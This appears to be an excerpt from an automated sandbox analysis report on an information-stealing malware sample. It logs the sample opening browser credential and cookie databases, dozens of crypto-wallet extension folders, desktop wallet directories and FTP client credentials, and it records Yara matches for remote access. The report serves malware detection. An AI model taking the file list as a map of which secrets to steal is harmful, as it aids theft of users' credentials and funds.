Source: A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: A247.exe, 00000005.00000003.2723762834.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: \\config\
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Exodus\backups\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT Jump to behavior
Source: Yara match File source: 00000005.00000003.2678333691.0000000000913000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3157954757.0000000000572000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2678080864.0000000000911000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: A247.exe PID: 6204, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kat2225.tmp PID: 6716, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000008.00000002.2674561163.00000000043B9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: A247.exe PID: 6204, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 00000000.00000002.2056480507.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2319406747.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2056438755.0000000002E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2319442146.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 8.2.5358.exe.4387719.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.5358.exe.2590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.5358.exe.4387719.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.5358.exe.45b0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.5358.exe.45b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.5358.exe.2590000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2673984496.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2674868300.00000000045B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2674561163.00000000042B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 5358.exe PID: 4296, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kat2225.tmp PID: 6716, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD70C40 sqlite3_bind_zeroblob, 9_2_6CD70C40
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD70D60 sqlite3_bind_parameter_name, 9_2_6CD70D60
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC98EA0 sqlite3_clear_bindings, 9_2_6CC98EA0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD70B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 9_2_6CD70B40
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC96410 bind,WSAGetLastError, 9_2_6CC96410
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC960B0 listen,WSAGetLastError, 9_2_6CC960B0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC9C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp, 9_2_6CC9C050
